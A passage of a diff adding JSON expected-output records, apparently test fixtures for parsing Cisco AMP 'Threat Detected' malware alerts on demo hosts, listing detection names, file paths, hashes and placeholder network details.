"10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261636", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 665000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 32281, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261635", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 509000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 33561, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259028591575130", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 984000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259028591575000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 35128, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:21.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251439135752194", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 455000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251439135752000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 36447, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258981346934873", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 346000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258981346935000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 38014, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:02.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258929807327320", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 334000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258929807327000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 39333, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542427", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 470000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 40652, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542426", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 112000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 41978, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542425", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 71000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43297, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667841684537367", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 532000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 44622, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667841684537366", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 454000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 45948, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667841684537365", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 80000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 47266, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258118058508361", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 636000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258118058508000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 48591, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667837389570068", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 689000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667837389570000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 49910, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:41.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258066518900808", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 608000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258066518901000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 51229, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + 